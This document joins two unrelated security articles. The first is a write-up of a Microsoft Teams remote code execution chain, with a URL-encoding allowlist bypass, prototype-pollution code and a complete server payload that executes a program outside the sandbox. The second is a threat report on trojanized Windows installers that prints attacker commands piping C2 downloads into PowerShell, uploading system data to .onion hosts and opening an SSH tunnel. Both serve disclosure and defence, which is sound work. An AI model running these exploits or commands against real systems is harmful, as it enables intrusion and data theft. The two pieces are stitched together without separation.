2022 Microsoft Teams RCE

Jan 16, 2023

Me (@adm1nkyj1) and jinmo123 (@jinmo123) of Theori participated in Pwn2Own 2022 Vancouver. We failed because of a time-allocation issue, but our bug and exploit were really cool, so we decided to share them on the blog!

Executive Summary

The deeplink handler for /l/task/:appId in Microsoft Teams can load an arbitrary URL in a webview/iframe. An attacker can leverage this together with Teams RPC functionality to get code execution outside the sandbox.

1. URL allowlist bypass using URL encoding

URL route example:

```js
...
k(p.states.appDeepLinkTaskModule, {
    url: "l/task/:appId?url&height&width&title&fallbackURL&card&completionBotId"
}),
k(p.states.appSfbFreQuickStartVideo, { url: "sfbfrequickstartvideo" }),
k(p.states.appDeepLinkMeetingCreate, {
    url: "l/meeting/new?meetingType&groupId&tenantId&deeplinkId&attendees&subject&content&startTime&endTime&nobyoe&qsdisclaimer"
}),
k(p.states.appDeepLinkMeetingDetails, {
    url: "l/meeting/:tenantId/:organizerId/:threadId/:messageId?deeplinkId&nobyoe&qsdisclaimer"
}),
k(p.states.appDeepLinkMeetingDetailsEventId, { url: "l/meeting/details?eventId&deeplinkId" }),
k(p.states.appDeepLinkVirtualEventCreate, { url: "l/virtualevent/new?eventType" }),
k(p.states.appDeepLinkVirtualEventDetails, { url: "l/virtualevent/:eventId" }),
...
```

In Microsoft Teams, there is a URL route handler for /l/task/:appId which accepts url as a parameter. This allows a chat bot created by a Teams application to send a link to a user; the link is supposed to be in the URL allowlist. The allowlist is constructed from various fields of the app definition:

```js
a = angular.isDefined(e.validDomains) ? _.clone(e.validDomains) : [];
return e.galleryTabs && a.push.apply(a, _.map(e.galleryTabs, function (e) {
    return i.getValidDomainFromUrl(e.configurationUrl)
})), e.staticTabs && a.push.apply(a, _.map(e.staticTabs, function (e) {
    return i.getValidDomainFromUrl(e.contentUrl)
})), e.connectors && a.push.apply(a, _.map(e.connectors, function (e) {
    return i.utilityService.parseUrl(e.configurationUrl).host
```

These domains, e.g.:

```
...
www.office.com
www.github.com
...
```

are converted into regular expressions and used to validate the url:

```js
...
t.prototype.isUrlInDomainList = function(e, t, n) {
    void 0 === n && (n = !1);
    for (var i = n ? e : this.parseUrl(e).href, s = 0; s < t.length; s++) {
        for (var a = "", r = t[s].split("."), o = 0; o < r.length; o++)
            a += (o > 0 ? "[.]" : "") + r[o].replace("*", "[^/^.]+");
        var c = new RegExp("^https://" + a + "((/|\\?).*)?$", "i");
        if (e.match(c) || i.match(c)) return !0
    }
    return !1
}
...
```

Regardless of the third parameter n, the check passes if the original url matches the generated regular expression. After the check, however, it is the parsed form (parseUrl) that is passed to the webview:

```js
e.prototype.setContainerUrl = function(e) {
    var t = this;
    this.sdkWindowMessageHandler && (this.sdkWindowMessageHandler.destroy(), this.sdkWindowMessageHandler = null);
    var n = this.utilityService.parseUrl(e);
    this.$q.when(this.htmlSanitizer.sanitizeUrl(n.href, ["https"])).then(function(e) {
        t.frameSrc = e
    })
}
```

This is problematic because parseUrl of utilityService url-decodes the url, while the check is done on the original, url-encoded url. In particular, when an allowlisted domain contains a wildcard, e.g. *.office.com, the generated regular expression is /^https://[^/^.]+[.]office[.]com((/|\?).*)?$/i. The wildcard becomes [^/^.]+, so a url like https://attacker.com%23.office.com passes the check. After decoding, however, it becomes https://attacker.com#.office.com, which loads attacker.com instead.
The Microsoft Planner app (appId: 1ded03cb-ece5-4e7c-9f73-61c375528078) has a domain with a wildcard in its validDomains field:

```json
{
    "manifestVersion": "1.7",
    "version": "0.0.19",
    "categories": [ "Microsoft", "Productivity", "ProjectManagement" ],
    "disabledScopes": [ "PrivateChannel" ],
    "developerName": "Microsoft Corporation",
    "developerUrl": "https://tasks.office.com",
    "privacyUrl": "https://privacy.microsoft.com/privacystatement",
    "termsOfUseUrl": "https://www.microsoft.com/servicesagreement",
    "validDomains": [
        "tasks.teams.microsoft.com",
        "retailservices.teams.microsoft.com",
        "retailservices-ppe.teams.microsoft.com",
        "tasks.office.com",
        "*.office.com"
    ],
    ...
}
```

As a result, this bug allows the attacker to load an arbitrary location into a webview.

PoC:

https://teams.live.com/_#/l/task/1ded03cb-ece5-4e7c-9f73-61c375528078?url=https://attacker.com%23.office.com/&height=100&width=100&title=hey&fallbackURL=https://aka.ms/hey&completionBotId=1&fqdn=teams.live.com
2. pluginHost allows dangerous RPC calls from any webview

Since contextIsolation is not enabled on the webview, the attacker can leverage prototype pollution to invoke arbitrary Electron IPC calls to other processes (see the Appendix section). Given this primitive, the attacker can invoke the 'calling:teams:ipc:initPluginHost' IPC call of the main process, which returns the id of the pluginHost window. pluginHost exposes dangerous RPC calls to any webview, e.g. returning a member of the 'registered objects', calling them, and importing some allowlisted modules.

lib/pluginhost/preload.js:

```js
// n, o is controllable
P(c.remoteServerMemberGet, (e, t, n, o) => {
    const i = s.objectsRegistry.get(n);
    if (null == i)
        throw new Error(`Cannot get property '${o}' on missing remote object ${n}`);
    return A(e, t, () => i[o]);
}),
// n, o, i is controllable
P(c.remoteServerMemberCall, (e, t, n, o, i) => {
    i = v(e, t, i);
    const r = s.objectsRegistry.get(n);
    if (null == r)
        throw new Error(`Cannot call function '${o}' on missing remote object ${n}`);
    return A(e, t, () => r[o](...i));
}),
```

The attacker can get the constructor of any object, then the constructor of that constructor (Function) to compile arbitrary JavaScript code, and finally call the compiled function:

```js
[_, pluginHost] = ipc.sendSync('calling:teams:ipc:initPluginHost', []);
msg = ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_MEMBER_GET', [{hey: 1}, 1, 'constructor', []], '')[0].id
msg = ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_MEMBER_CALL', [{hey: 1}, msg, 'constructor', [{type: 'value', value: 'alert()'}]], '')[0].id
```

require() is not exposed to the script itself, but the attacker-controlled script can overwrite the prototype of String, which is useful in this code:

```js
function loadSlimCore(slimcoreLibPath) {
    let slimcore;
    if (utility.isWebpackRuntime()) {
        const slimcoreLibPathWebpack = slimcoreLibPath.replace(/\\/g, "\\\\");
        slimcore = eval(`require('${slimcoreLibPathWebpack}')`);
        ...
    }
    ...
}

function requireEx(e, t) {
    ...
    const { slimCoreLibPath: n, error: o } = electron_1.ipcRenderer.sendSync(
        constants.events.calling.getSlimCoreLibInfo
    );
    if (o) throw new Error(o);
    if (t === n) return loadSlimCore(n); // n === 'slimcore'
    throw new Error("Invalid module: " + t);
}

// y === requireEx
P(c.remoteServerRequire, (e, t, n) => A(e, t, () => y(e, n))),
```

If the attacker calls remoteServerRequire with 'slimcore' as an argument, pluginHost evaluates the string returned by String.prototype.replace.
Therefore, the following code can invoke require with arbitrary arguments and call methods in the module:

```js
msg = ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_MEMBER_CALL', [{hey: 1}, msg, 'constructor', [{type: 'value', value: 'var backup=String.prototype.replace; String.prototype.replace = ()=>"slimcore\');require(`child_process`).exec(`calc.exe`);(\'";'}]], '')[0].id
ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_FUNCTION_CALL', [{hey: 1}, msg, []], '')
ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_REQUIRE', [{hey: 1}, 'slimcore'], '')
```

By using the child_process module, the attacker can execute any program.

Appendix A: Accessing any bundled modules when contextIsolation is not enabled between preload script and web pages

Electron compiles and executes a script named sandbox_bundle.js in every sandboxed frame, and it registers a handler that shows security warnings if the user wants. To enable the security warnings, users can set ELECTRON_ENABLE_SECURITY_WARNINGS either in environment variables or on window.

lib/renderer/security-warnings.ts#L43-L46:

```js
if ((env && env.ELECTRON_ENABLE_SECURITY_WARNINGS) ||
    (window && window.ELECTRON_ENABLE_SECURITY_WARNINGS)) {
    shouldLog = true;
}
```

This is called on the 'load' event of the window:

```js
export function securityWarnings (nodeIntegration: boolean) {
    const loadHandler = async function () {
        if (shouldLogSecurityWarnings()) {
            const webPreferences = await getWebPreferences();
            logSecurityWarnings(webPreferences, nodeIntegration);
        }
    };
    window.addEventListener('load', loadHandler, { once: true });
}
```

security-warnings.ts is also bundled into sandbox_bundle.js using webpack. There is an import of webFrame, which lazily loads "./lib/renderer/api/web-frame.ts":

```js
import { webFrame } from 'electron';
...
```
```js
const isUnsafeEvalEnabled = () => {
    return webFrame._isEvalAllowed();
}; // this is called by warnAboutInsecureCSP + logSecurityWarnings
```

The lazy loading is done by electron.ts:

```js
import { defineProperties } from '@electron/internal/common/define-properties';
import { moduleList } from '@electron/internal/sandboxed_renderer/api/module-list';

module.exports = {};
defineProperties(module.exports, moduleList);
```

In define-properties.ts, a getter is defined for every module in moduleList; the loader is invoked when a module, e.g. webFrame, is accessed.

```js
const handleESModule = (loader: ElectronInternal.ModuleLoader) => () => {
    const value = loader();
    if (value.__esModule && value.default) return value.default;
    return value;
};

// Attaches properties to |targetExports|.
export function defineProperties (targetExports: Object, moduleList: ElectronInternal.ModuleEntry[]) {
    const descriptors: PropertyDescriptorMap = {};
    for (const module of moduleList) {
        descriptors[module.name] = {
            enumerable: !module.private,
            get: handleESModule(module.loader)
        };
    }
    return Object.defineProperties(targetExports, descriptors);
}
```

The loader for webFrame is defined in the moduleList:

```js
export const moduleList: ElectronInternal.ModuleEntry[] = [
    {
    ...
    {
        name: 'webFrame',
        loader: () => require('@electron/internal/renderer/api/web-frame')
    },
```

which is compiled as:

```js
}, {
    name: "webFrame",
    loader: ()=>r(/*! @electron/internal/renderer/api/web-frame */ "./lib/renderer/api/web-frame.ts")
}, {
```

The function r above is __webpack_require__, which actually loads the module if it is not loaded yet:

```js
function __webpack_require__(r) {
    if (t[r]) return t[r].exports;
```

Here, t is the list of cached modules. If the module has not been loaded by any code, t[r] is undefined. Also, t.__proto__ points to Object.prototype, so the attacker can install a getter for the module path to capture the whole list of cached modules.
```js
const KEY = './lib/renderer/api/web-frame.ts';
let modules;
Object.prototype.__defineGetter__(KEY, function () {
    console.log(this);
    modules = this;
    delete Object.prototype[KEY];
    main();
})
```

This enables the attacker to get the @electron/internal/renderer/api/ipc-renderer module and send any IPC message to any process:

```js
var ipc = modules['./lib/renderer/api/ipc-renderer.ts'].exports.default;
[_, pluginHost] = ipc.sendSync('calling:teams:ipc:initPluginHost', []);
```

We utilized this to send IPC to pluginHost (see Section 2) and execute a program outside the sandbox.

Exploit

Client:

https://teams.live.com/l/task/1ded03cb-ece5-4e7c-9f73-61c375528078?url=https://0e1%2Ekr\cd2c4753c4cb873c7be66e3ffdeae71f71ce33482e9921bab01dc3670a3b4f95\%23.office.com/&height=100&width=100&title=hey&fallbackURL=https://aka.ms/hey&completionBotId=&fqdn=teams.live.com

Server:

```html
<script>
    const KEY = './lib/renderer/api/web-frame.ts';
    let modules;
    Object.prototype.__defineGetter__(KEY, function () {
        console.log(this);
        modules = this;
        delete Object.prototype[KEY];
        main();
    })
    window.ELECTRON_ENABLE_SECURITY_WARNINGS = true;

    function main() {
        var ipc = modules['./lib/renderer/api/ipc-renderer.ts'].exports.default;
        [_, pluginHost] = ipc.sendSync('calling:teams:ipc:initPluginHost', []);
        msg = ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_REQUIRE', [{ hey: 1 }, 'slimcore'], '')[0]
        msg = ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_MEMBER_GET', [{ hey: 1 }, msg.id, 'constructor', []], '')[0]
        msg = ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_MEMBER_CALL', [{ hey: 1 }, msg.id, 'constructor', [{ type: 'value', value: 'var backup=String.prototype.replace; String.prototype.replace = ()=>"slimcore\');require(`child_process`).exec(`calc.exe`);(\'";' }]], '')[0]
        ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_FUNCTION_CALL', [{ hey: 1 }, msg.id, []], '')
        msg = ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_REQUIRE', [{ hey: 1 }, 'slimcore'], '')
    }
</script>
```
Source: https://blog.pksecurity.io/2023/01/16/2022-microsoft-teams-rce.html
Trojanized Windows 10 Operating System Installers Targeted Ukrainian Government

MANDIANT INTELLIGENCE | DEC 15, 2022 | 16 MIN READ

Executive Summary

Mandiant identified an operation focused on the Ukrainian government via trojanized Windows 10 operating system installers. These were distributed via torrent sites in a supply chain attack. Threat activity tracked as UNC4166 likely trojanized and distributed malicious Windows operating system installers which drop malware that conducts reconnaissance and deploys additional capability on some victims to conduct data theft. The trojanized files use the Ukrainian language pack and are designed to target Ukrainian users. Following compromise, targets selected for follow-on activity included multiple Ukrainian government organizations.

At this time, Mandiant does not have enough information to attribute UNC4166 to a sponsor or previously tracked group. However, UNC4166's targets overlap with organizations targeted by GRU-related clusters with wipers at the outset of the war.

Threat Detail

Mandiant uncovered a socially engineered supply chain operation focused on Ukrainian government entities that leveraged trojanized ISO files masquerading as legitimate Windows 10 operating system installers. The trojanized ISOs were hosted on Ukrainian- and Russian-language torrent file sharing sites. Upon installation of the compromised software, the malware gathers information on the compromised system and exfiltrates it. At a subset of victims, additional tools are deployed to enable further intelligence gathering. In some instances, we discovered additional payloads that were likely deployed following initial reconnaissance, including the STOWAWAY, BEACON, and SPAREPART backdoors.
One trojanized ISO, "Win10_21H2_Ukrainian_x64.iso" (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4), uses the Ukrainian language pack and could be downloaded from "https://toloka[.]to/t657016#1873175". The Toloka site is focused on a Ukrainian audience and the image uses the Ukrainian language (Figure 1). The same ISO was observed being hosted on a Russian torrent tracker (https://rutracker[.]net/forum/viewtopic.php?t=6271208) using the same image. The ISO contained malicious scheduled tasks that were altered and identified on multiple systems at three different Ukrainian organizations, beaconing to .onion TOR domains beginning around mid-July 2022.

Figure 1: Win10_21H2_Ukrainian_x64.iso (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4)

Attribution and Targeting

Mandiant is tracking this cluster of threat activity as UNC4166. We believe that the operation was intended to target Ukrainian entities, due to the language pack used and the website used to distribute it. The use of trojanized ISOs is novel in espionage operations, and the included anti-detection capabilities indicate that the actors behind this activity are security conscious and patient, as the operation would have required significant time and resources to develop and to wait for the ISO to be installed on a network of interest. Mandiant has not uncovered links to previously tracked activity, but believes the actor behind this operation has a mandate to steal information from the Ukrainian government. The organizations where UNC4166 conducted follow-on interactions included organizations that were historically victims of disruptive wiper attacks that we associate with APT28 since the outbreak of the invasion.

The ISO was originally hosted on a Ukrainian torrent tracker called toloka.to by an account, "Isomaker", which was created on May 11, 2022. The ISO was configured to disable the typical security telemetry a Windows computer would send to Microsoft, and to block automatic updates and license verification.
There was no indication of a financial motivation for the intrusions, either through the theft of monetizable information or the deployment of ransomware or cryptominers.

Outlook and Implications

Supply chain operations can be leveraged for broad access, as in the case of NotPetya, or for the ability to discreetly select high value targets of interest, as in the SolarWinds incident. These operations represent a clear opportunity for operators to get to hard targets and carry out major disruptive attacks which may not be contained to the conflict zone. For more research from Google Cloud on securing the supply chain, see this Perspectives on Security report.

Technical Annex

Mandiant identified several devices within Ukrainian government networks which contained malicious scheduled tasks that communicated to a TOR website from around July 12, 2022. These scheduled tasks act as a lightweight backdoor that retrieves tasking via HTTP requests to a given command and control (C2) server. The responses are then executed via PowerShell. From data collated by Mandiant, it appears that victims are selected by the threat actor for further tasking. In some instances, we discovered devices had additional payloads that we assess were deployed following initial reconnaissance of the users, including the deployment of the STOWAWAY and BEACON backdoors.

STOWAWAY is a publicly available backdoor and proxy. The project supports several types of communication, such as SSH and SOCKS5. The backdoor component supports upload and download of files, a remote shell, and basic information gathering.

BEACON is a backdoor written in C/C++ that is part of the Cobalt Strike framework. Supported backdoor commands include shell command execution, file transfer, file execution, and file management. BEACON can also capture keystrokes and screenshots as well as act as a proxy server. BEACON may also be tasked with harvesting system credentials, port scanning, and enumerating systems on a network.
BEACON communicates with a C2 server via HTTP or DNS.

The threat actor also began to deploy secondary toehold backdoors in the environment, including SPAREPART, likely as a means of redundancy for the initial PowerShell bootstraps. SPAREPART is a lightweight backdoor written in C that uses the device's UUID as a unique identifier for communications with the C2. Upon successful connection to a C2, SPAREPART will download the tasking and execute it through a newly created process.

Details

Infection Vector

Mandiant identified multiple installations of a trojanized ISO, which masquerades as a legitimate Windows 10 installer using the Ukrainian language pack with telemetry settings disabled. We assess that the threat actor distributed these installers publicly, and then used an embedded scheduled task to determine whether the victim should have further payloads deployed.

Win10_21H2_Ukrainian_x64.iso (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4)
Malicious trojanized Windows 10 installer
Downloaded from https://toloka.to/t657016#1873175

Forensic analysis of the ISO identified the changes made by UNC4166 that enable the threat actor to perform additional triage of victim accounts.

Modification of the GatherNetworkInfo and Consolidator Scheduled Tasks

The ISO contained altered GatherNetworkInfo and Consolidator scheduled tasks, which added a secondary action that executed the PowerShell downloader action. Both scheduled tasks are legitimate components of Windows and execute the gatherNetworkInfo.vbs script or the waqmcons.exe process.

Figure 2: Legitimate GatherNetworkInfo task configuration

The altered tasks both contained a secondary action that was responsible for executing a PowerShell command. This command makes use of the curl binary to download a command from the C2 server; the downloaded command is then executed through PowerShell. The C2 servers in both instances were addresses of TOR gateways.
These gateways advertise themselves as a mechanism for users to access TOR from the standard internet (onion.moe, onion.ws). These tasks act as the foothold access into compromised networks, allowing UNC4166 to conduct reconnaissance on the victim device to determine networks of value for follow-on threat activity.

Figure 3: Trojanized GatherNetworkInfo task configuration

Based on forensic analysis of the ISO file, Mandiant identified that the compromised tasks were both edited as follows:

C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator (MD5: ed7ab9c74aad08b938b320765b5c380d)
Last edit date: 2022-05-11 12:58:55
Executes: powershell.exe (curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H ('h:'+(wmic csproduct get UUID)))

C:\Windows\System32\Tasks\Microsoft\Windows\NetTrace\GatherNetworkInfo (MD5: 1433dd88edfc9e4b25df370c0d8612cf)
Last edit date: 2022-05-11 12:58:12
Executes: powershell.exe curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion.ws -H ('h:'+(wmic csproduct get UUID)) | powershell.exe

Note: At the time of analysis, the onion[.]ws C2 server was redirecting requests to legitimate websites.

Software Piracy Script

The ISO contained an additional file not found in standard Windows distributions called SetupComplete.cmd. SetupComplete is a Windows batch script that is configured to be executed upon completion of the Windows installation, but before the end user is able to use the device. The script appears to be an amalgamation of multiple public scripts, including remove_MS_telemetry.cmd by DeltoidDelta and activate.cmd by Poudyalanil (originally wiredroid), with the addition of a command to disable OneDriveSetup which was not identified in either script.
The script is responsible for disabling several legitimate Windows services and tasks, disabling Windows updates, blocking IP addresses and domains related to legitimate Microsoft services, disabling OneDrive, and activating the Windows license.

Forensic artifacts led Mandiant to identify three additional scripts that were historically on the image; we assess that over time the threat actor has made alterations to these files.

SetupComplete.cmd (MD5: 84B54D2D022D3DF9340708B992BF6669)
Batch script to disable legitimate services and activate Windows
File currently hosted on ISO

SetupComplete.cmd (MD5: 67C4B2C45D4C5FD71F6B86FA0C71BDD3)
Batch script to disable legitimate services and activate Windows
File recovered through forensic file carving

SetupComplete.cmd (MD5: 5AF96E2E31A021C3311DFDA200184A3B)
Batch script to disable legitimate services and activate Windows
File recovered through forensic file carving

Victim Identification

Mandiant assesses that the threat actor performs initial triage of compromised devices, likely to determine whether the victims are of interest. This triage takes place using the trojanized scheduled tasks. In some cases, the threat actor may deploy additional capability for data theft or new persistence backdoors, likely for redundancy in the case of SPAREPART, or to enable additional tradecraft with BEACON and STOWAWAY.

The threat actor likely uses the device's UUID as a unique identifier to track victims. This unique identifier is transferred as a header in all HTTP requests, both to download tasking and to upload stolen data/responses.
The threat actor's playbook appears to follow a distinct pattern:

1. Execute a command.
2. Optionally, filter or expand the results.
3. Export the results to CSV using the Export-Csv command and write to the path sysinfo (%system32%\sysinfo).
4. Optionally, compress the data into sysinfo.zip (%system32%\sysinfo.zip).
5. Optionally, upload the data instantaneously to the C2 (in most cases this is a separate task that is executed at the next beacon).

Mandiant identified the threat actor exfiltrating data containing system information, directory listings including timestamps, and device geo-location. A list of commands used can be found in the indicators section.

Interestingly, we did uncover a command that didn't fit the aforementioned pattern in at least one instance. This command was executed on at least one device where the threat actor had access for several weeks.

curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H h:filefile-file-file-file-filefilefile --output temp.zip

Although we were not able to discover evidence that temp.zip was executed or recover the file, we were able to identify the content of the file directly from the C2 during analysis. This command is likely an alternative mechanism for the threat actor to collect the system information for the current victim, although it's unclear why they wouldn't deploy the command directly.

chcp 65001; [console]::outputencoding = [system.text.encoding]::UTF8; Start-Process powershell -argument "Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8" -wait -nonewwindow; curl.exe -H ('h:'+(wmic csproduct get UUID)) --data-binary "@sysinfo" -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe; rm sysinfo

The download command is notable, as the threat actor uses a hardcoded UUID (filefile-file-file-file-filefilefile), which we assess is likely a default value.
It's unclear why the threat actor performed this additional request in favor of downloading the command itself; we believe this may be used as a default command by the threat actors.

Follow-On Tasking

If UNC4166 determined a device likely contained intelligence of value, subsequent actions were taken on these devices. Based on our analysis, the subsequent tasking falls into three categories:

- Deployment of tools to enable exfiltration of data (like TOR and Sheret)
- Deployment of additional lightweight backdoors, likely to provide redundant access to the target (like SPAREPART)
- Deployment of additional backdoors to enable additional functionality (like BEACON and STOWAWAY)

TOR Browser Downloaded

In some instances, Mandiant identified that the threat actor attempted to download the TOR browser onto the victim's device. This was originally attempted through downloading the file directly from the C2 via curl. However, the following day the actor also downloaded a second TOR installer directly from the official torproject.org website. It's unclear why the threat actor performed these actions, as Mandiant was unable to identify any use of TOR on the victim device, although this would provide the actor a second route to communicate with infrastructure through TOR, or may be used by additional capability as a route for exfiltration. We also discovered the TOR installer was hosted on some of the backup infrastructure, which may indicate the C2 URLs resolve to the same device.

bundle.zip (MD5: 66da9976c96803996fc5465decf87630)
Legitimate TOR installer bundle
Downloaded from https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe/bundle.zip
Downloaded from https://56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid.onion[.]moe/bundle.zip

Use of Sheret HTTP Server and localhost[.]run

In some instances, the threat actor deployed a publicly available HTTP server called Sheret to conduct data theft interactively on victim devices.
The threat actor configured Sheret to serve locally, then used SSH to create a tunnel from the local device to the service localhost[.]run. In at least one instance, this web server was used for serving files on a removable drive connected to the victim device, and Mandiant was able to confirm that multiple files were exfiltrated via this mechanism. The command used for SSH tunnelling was:

ssh -R 80:localhost:80 -i defaultssh localhost[.]run -o stricthostkeychecking=no >> sysinfo

This command configures the local system to create a tunnel from the local device to the website localhost.run.

C:\Windows\System32\HTTPDService.exe (MD5: a0d668eec4aebaddece795addda5420d)
Sheret web server
Publicly available as a build from https://github.com/ethanpil/sheret
Compile date: 1970/01/01 00:00:00

Deployment of SPAREPART, Likely as a Redundant Backdoor

We identified the creation of a service following initial recon that we believe was the deployment of a redundant backdoor we call SPAREPART. The service, named "Microsoft Delivery Network", was created to execute %SYSTEM32%\MicrosoftDeliveryNetwork\MicrosoftDeliveryCenter with the arguments "56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid.onion[.]moe powershell.exe" via the Windows SC command.

Functionally, SPAREPART is identical to the PowerShell backdoors that were deployed via the scheduled tasks in the original ISOs. SPAREPART is executed as a Windows service DLL which, upon execution, will receive the tasking and execute it by piping the commands into the PowerShell process.

SPAREPART parses the raw SMBIOS firmware table via the Windows GetSystemFirmwareTable API; this code is nearly identical to code published by Microsoft on GitHub. The code's purpose is to obtain the UUID of the device, which is later formatted into the same header (h: <UUID>) for use in communications with the C2 server.

Figure 4: SPAREPART formatting of header

The payload parses the arguments provided on the command line.
Interestingly, there is an error in this parsing. If the threat actor provides a single argument to the payload, that argument is used as the URL and tasking can be downloaded. However, if the second argument (in our instance, powershell.exe) is missing, the payload will later attempt to create a process with an invalid argument, which means that the payload is unable to execute commands provided by the threat actor.

Figure 5: SPAREPART parsing threat actor input

SPAREPART has a unique randomization for its sleep timer, which enables the threat actor to randomize beaconing timing. The randomization is seeded from the base address of the image in memory; this value is then used to derive a value between 0 and 59, which acts as the sleep timer in minutes. As the backdoor starts up, it will sleep for up to 59 minutes before reaching out to the C2. Any subsequent requests will be delayed for between 3 and 4 hours. If after 10 sleeps the payload has received no tasking (30-40 hours of delays), the payload will terminate until the service is next executed.

Figure 6: SPAREPART randomizing the time for next beacon

After the required sleep timer has been fulfilled, the payload will attempt to download a command using the provided URL. The payload attempts to download tasking using the WinHttp set of APIs and the hardcoded user agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0". The payload performs a GET request using the previously formatted headers; provided the response has a valid status (200), the data will be read and written to a previously created pipe.

Figure 7: SPAREPART downloading payload

If a valid response is obtained from the C2 server, the payload will create a new process using the second argument (powershell.exe) and pipe the downloaded commands in as the standard input. The payload makes no attempt to return the response to the actor, similarly to the PowerShell backdoor.
Figure 8: SPAREPART executing a command

Although we witnessed the installation of this backdoor, the threat actor reverted to the PowerShell backdoor for tasking a couple of hours later. Due to the similarities in the payloads and the fact that the threat actor reverted to the PowerShell backdoor, we believe that SPAREPART is a redundant backdoor, likely to be used if the threat actor loses access to the original scheduled tasks.

MicrosoftDeliveryCenter (MD5: f9cd5b145e372553dded92628db038d8)
SPAREPART backdoor
Compiled on: 2022/11/28 02:32:33
PDB path: C:\Users\user\Desktop\ImageAgent\ImageAgent\PreAgent\src\builder\agent.pdb

Deployment of Additional Backdoors

In addition to the deployment of SPAREPART, the threat actor also deployed additional backdoors on some limited devices. In early September, UNC4166 deployed the payload AzureSettingSync.dll and configured its execution via a scheduled task named AzureSync on at least one device. The scheduled task was configured to execute AzureSync via rundll32.exe. AzureSettingSync is a BEACON payload configured to communicate with cdnworld.org, which was registered on June 24, 2022 with an SSL certificate from Let's Encrypt dated August 26, 2022.

C:\Windows\System32\AzureSettingSync.dll (MD5: 59a3129b73ba4756582ab67939a2fe3c)
BEACON backdoor
Original name: tr2fe.dll
Compiled on: 1970/01/01 00:00:00
Dropped by 529388109f4d69ce5314423242947c31 (BEACON)
Connects to https://cdnworld[.]org/34192–general-feedback/suggestions/35703616-cdn–
Connects to https://cdnworld[.]org/34702–general/sync/42823419-cdn

Due to remediation on some compromised devices, we believe that the BEACON instances were quarantined on the devices. Following this, we identified that the threat actor had deployed a STOWAWAY backdoor on the victim device.
C:\Windows\System32\splwow86.exe (MD5: 0f06afbb4a2a389e82de6214590b312b)
STOWAWAY backdoor
Compiled on: 1970/01/01 00:00:00
Connects to 193.142.30.166:443

%LOCALAPPDATA%\SODUsvc.exe (MD5: a8e7d8ec0f450037441ee43f593ffc7c)
STOWAWAY backdoor
Compiled on: 1970/01/01 00:00:00
Connects to 91.205.230.66:8443

Indicators

Scheduled Tasks
C:\Windows\System32\Tasks\MicrosoftWindowsNotificationCenter (MD5: 16b21091e5c541d3a92fb697e4512c6d)
Scheduled task configured to execute Powershell.exe with the command line:
curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H ('h:'+(wmic csproduct get UUID)) | powershell

Trojanized Scheduled Tasks
C:\Windows\System32\Tasks\Microsoft\Windows\NetTrace\GatherNetworkInfo (MD5: 1433dd88edfc9e4b25df370c0d8612cf)
C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator (MD5: ed7ab9c74aad08b938b320765b5c380d)

BEACON Backdoor
C:\Windows\System32\AzureSettingSync.dll (MD5: 59a3129b73ba4756582ab67939a2fe3c)

Scheduled Tasks for Persistence
C:\Windows\System32\Tasks\Microsoft\Windows\Maintenance\AzureSync
C:\Windows\System32\Tasks\Microsoft\Windows\Maintenance\AzureSyncDaily

STOWAWAY Backdoor
C:\Windows\System32\splwow86.exe (MD5: 0f06afbb4a2a389e82de6214590b312b)
%LOCALAPPDATA%\SODUsvc.exe (MD5: a8e7d8ec0f450037441ee43f593ffc7c)

Services for Persistence
Printer driver host for applications
SODUsvc

On Host Recon Commands
Get-ChildItem -Recurse -Force -Path ((C:)+'') | Select-Object -Property Psdrive, FullName, Length, Creationtime, lastaccesstime, lastwritetime | Export-Csv -Path sysinfo -encoding UTF8; Compress-Archive -Path sysinfo -DestinationPath sysinfo.zip -Force; Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8
invoke-restmethod http://ip-api[.]com/json | Export-Csv -path sysinfo -encoding UTF8
Get-Volume | Where-Object {$_.DriveLetter -and $_.DriveLetter -ne 'C' -and $_.DriveType -eq 'Fixed'} | ForEach-Object {Get-ChildItem -Recurse -Directory ($_.DriveLetter+':')
| Select-Object -Property Psdrive, FullName, Length, Creationtime, lastaccesstime, lastwritetime | Export-Csv -Path sysinfo -encoding UTF8; Compress-Archive -Path sysinfo -DestinationPath sysinfo -Force; curl.exe -H ('h:'+(wmic csproduct get UUID)) --data-binary '@sysinfo.zip' -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe
